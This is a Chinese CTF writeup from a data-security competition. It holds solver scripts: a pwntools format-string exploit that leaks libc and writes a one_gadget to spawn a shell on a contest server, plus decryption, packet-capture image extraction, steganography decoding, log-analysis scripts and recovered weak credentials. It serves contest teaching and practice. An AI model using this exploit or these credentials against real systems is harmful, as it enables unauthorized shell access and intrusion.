第二届数据安全大赛暨首届“数信杯”东部赛区writeup

from pwn import *
context.arch = 'amd64'context.log_level = 'debug'context.terminal = ['tmux', 'sp' ,'-h']
#libc = ELF('./libc-2.23.so')libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#io = process("./pb")io = remote('106.15.53.199','32829')
payload = "%11$p%13$p"io.sendlineafter("How to do?n", payload)
leak = eval(io.recv(14))info(hex(leak))
libc_start_main = leak - 240info(hex(libc_start_main))
libc_base = libc_start_main - libc.sym['__libc_start_main']info(hex(libc_base))
'''0x45226 execve("/bin/sh", rsp+0x30, environ)constraints:  rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)constraints:  [rsp+0x30] == NULL
0xf03a4 execve("/bin/sh", rsp+0x50, environ)constraints:  [rsp+0x50] == NULL
0xf1247 execve("/bin/sh", rsp+0x70, environ)constraints:  [rsp+0x70] == NULL'''one_gadget_list = [0x45226, 0x4527a, 0xf03a4, 0xf1247]one_gadget = libc_base + one_gadget_list[3]info(hex(one_gadget))raw_input()
stack_leak_addr = eval(io.recv(14))info(hex(stack_leak_addr))
ret_addr = stack_leak_addr - 256 + 32info(hex(ret_addr))
write_in = ret_addr & 0xffffnum_len = len(str(write_in))payload = "%{}c%13$hn".format(write_in-num_len + 5)io.sendlineafter("How to do?n", payload)payload = "%{}c%39$hn".format((one_gadget & 0xffff))io.sendlineafter("How to do?n", payload)
payload = "%{}c%13$hn".format(write_in - num_len + 7)io.sendlineafter("How to do?n", payload)payload = "%{}c%39$hn".format(((one_gadget >> 16) & 0xffff))#gdb.attach(io, "b *0x400779")io.sendlineafter("How to do?n", payload)
io.sendlineafter("How to do?n", 'a'*100)
io.interactive()

import base64import re
with open('en_file_data.enf', 'rb') as f:    data = list(f.read())
for i in range(len(data)):    data[i] = ((data[i] << 5) & 0xff) | (data[i] >> 3)data = bytes(data).decode()b64 = re.findall(r'[A-Za-z0-9+/]*={0,2}', data)res = b''for x in b64:    if x == '':        continue    x = base64.b64decode(x)    res += x
with open('res', 'wb') as f:    f.write(res)
res_m = [x.split(b' ') for x in res.split(b'n')]print(res_m[12-1][2-1]) # 第12行第2列

736463199528108971

from arc4 import ARC4
with open('en_file_data.enf2', 'rb') as f:    data = f.read().split(b'rn')k1 = b"6A1D4E2a2276Y7JL" # from debuggingk2 = b"276Y7JB6A1D4E2A2" # from debugging
res = b''for x in data:    l = list(x)    for i in range(len(l)):        l[i] ^= k2[i%len(k2)]    rc4 = ARC4(k1)    ans = rc4.encrypt(bytes(l))    res += ans
with open('res', 'wb') as f:    f.write(res)
res_m = [x.split(b' ') for x in res.split(b'n')]print(res_m[8-1][2-1]) # 第8行第2列

855981200427146647

<?phpecho md5('ftp+admin+admin123');flag为:458e8dbe703531b99e3381853b3134ef

<?php
echo md5('101+key');
flag为:717c0890a66bcf9524e87fdccb7d2bf4

import pysharkfrom PIL import Imageimport numpy as np
def get_png(): # 导出图片    cap = pyshark.FileCapture('./catcat.pcapng', display_filter="ftp-data")    n = 1    for packet in cap:        p = packet['TCP'].get_field('payload')        if p.startswith("89:50:4e:47"):            png = bytes([int(x, 16) for x in p.split(':')])            with open(f'in/{n}.png', 'wb') as f:                f.write(png)            n += 1    return n
def tog_png(fn): # 拼接图片    img = np.array(Image.open('in/1.png'))    height, width, color = img.shape    res_img = np.zeros((height*100, width, color), dtype=int)    for x in range(1, 101):        img = np.array(Image.open(f"in/{x}.png"))        # img = np.array(Image.open(f"output/res_{x}.png"))        height, width, color = img.shape        for j in range(height):            res_img[j+(x-1)*height] = img[j]    Image.fromarray(np.uint8(res_img)).save(fn)    return
def arnold(im_file, a, b, fn):    img = np.array(Image.open(im_file))    height, width, color = img.shape    res_img = np.zeros((height, width, color), dtype=int)    for j in range(height):        for i in range(width):            res_img[((a*b+1)*j-a*i) % height, (-b*j+i) % width] = img[j, i]    Image.fromarray(np.uint8(res_img)).save(fn)    return
if __name__ == '__main__':    assert get_png() == 100+1    a = 0x6f6c53    b = 0x729e    tog_png('res0.png')arnold('res0.png', a, b, 'res1.png')

import base64def get_flag():  # stegsolve导出lsb数据    lsb = "R1kzRE1RWldHRTNET04yQ0dNWlRNTlJUR00zREdNWlJHWVpER05CVEhFWlRLTVpRR00yREdNSlRIRVpUQ05SV0dZWVRNTlJUR1laVEtNWlhHTTNER09CVEdZWlRNTlJXR000VEdPSlRIQVpUQU1aV0dZWlRNTkJYSVE9PT09PT0="    b64 = base64.b64decode(lsb)    b32 = base64.b32decode(b64)    flag = bytes.fromhex(b32.decode())    print(flag)

flag{3f3c1b49504191faf6576866f99806cd}

table_log=[……]table_groups=[……]table_users=[……]table_api=[……]for i in range(0,len(table_log)):    log=table_log[i]    user_id=log[1]    method=log[2].split(" ")[5].replace('"',"")    api_path=log[2].split(" ")[6]    group_id=table_users[user_id-1][-1]    methods=table_groups[group_id-1][1]    #print(methods)    api_paths=table_groups[group_id-1][2]    tmp_api_paths=[]    for j in api_paths.split(','):        tmp_api_paths.append(table_api[int(j)-1][1])    api_paths=str(tmp_api_paths)    #print(api_paths)    if method not in methods or api_path not in api_paths:        for k in table_api:            if k[1] in api_path:                print(str(user_id)+"_"+str(group_id)+"_"+str(k[0])+"_"+str(i+1))

<?phpecho md5('129_3_92_3223,137_7_16_4436,423_10_26_2667,469_4_3_3917');
flag为:8634fe5ad186b44f9a7e51ac0595a768

<?phpecho md5('admin:admin@QWEzxc');flag为:95e1da8517497ee29e716a2835375eeb

<?phpecho md5('webuser:1q2w3e4r5t6y');flag为:a18b8e2d1a8ee267599b04be62f0a26a